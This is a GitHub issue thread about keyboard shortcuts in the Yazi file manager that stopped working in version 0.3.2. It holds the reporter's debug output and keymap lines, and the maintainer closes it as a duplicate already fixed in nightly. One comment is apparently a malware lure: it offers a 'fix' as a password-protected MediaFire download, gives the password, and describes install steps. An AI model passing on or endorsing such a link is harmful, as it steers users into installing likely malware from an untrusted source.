### ISSUE TITLE
Some shortcuts stopped working after updating to the 0.3.2 version

### ISSUE THREAD

**Issue by PoisonFrog** [sxyazi/yazi#1589] opened 2024-09-01 21:55 UTC
### What system are you running Yazi on?

Linux X11

### What terminal are you running Yazi in?

kitty 0.36.1

### `yazi --debug` output

```Shell
Yazi
    Version: 0.3.2 (Arch Linux 2024-08-31)
    Debug  : false
    OS     : linux-x86_64 (unix)

Ya
    Version: 0.3.2 (Arch Linux 2024-08-31)

Emulator
    Emulator.via_env: ("xterm-kitty", "")
    Emulator.via_csi: Ok(Kitty)
    Emulator.detect : Kitty

Adapter
    Adapter.matches: Kitty

Desktop
    XDG_SESSION_TYPE: Some("x11")
    WAYLAND_DISPLAY : None
    DISPLAY         : Some(":0.0")

SSH
    shared.in_ssh_connection: false

WSL
    /proc/sys/fs/binfmt_misc/WSLInterop: false

Variables
    SHELL              : Some("/usr/bin/zsh")
    EDITOR             : Some("nvim")
    VISUAL             : None
    YAZI_FILE_ONE      : None
    YAZI_CONFIG_HOME   : None

Text Opener
    default: Some(Opener { run: "${EDITOR:=vi} \"$@\"", block: true, orphan: false, desc: "$EDITOR", for_: None, spread: true })
    block  : Some(Opener { run: "${EDITOR:=vi} \"$@\"", block: true, orphan: false, desc: "$EDITOR", for_: None, spread: true })

Multiplexers
    TMUX               : false
    tmux version       : 3.4
    ZELLIJ_SESSION_NAME: None
    Zellij version     : No such file or directory (os error 2)

Dependencies
    file             : 5.45
    ueberzugpp       : 2.9.6
    ffmpegthumbnailer: 2.2.2
    magick           : 7.1.1-37
    fzf              : 0.54.3
    fd               : 10.2.0
    rg               : 14.1.0
    chafa            : 1.14.2
    zoxide           : 0.9.4
    7z               : 17.05
    7zz              : No such file or directory (os error 2)
    jq               : 1.7.1
```

### Did you try the latest nightly build to see if the problem got fixed?

No, and I'll explain why below

### Describe the bug

Some of my shortcuts using the `'` stopped working after updating Yazi.

### Minimal reproducer

The shortcuts that stopped working are written in this format:
```
	{ on = [ "'", "w" ],       run = "cd ~/Downloads",   desc = "Go to Downloads" },
	{ on = [ "'", "P" ],       run = "cd ~/Public",      desc = "Go to Public" },
```

**Comment by goncastrum** [comment] 2024-09-01 22:28
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by sxyazi** [comment] 2024-09-01 22:31
Duplicate of https://github.com/sxyazi/yazi/issues/1572, already fixed in the nightly version, I'll find time to release a new version soon

Closing as duplicate and already fixed in the main branch

**Closed by sxyazi** 2024-09-01 22:31 UTC
Labels: bug
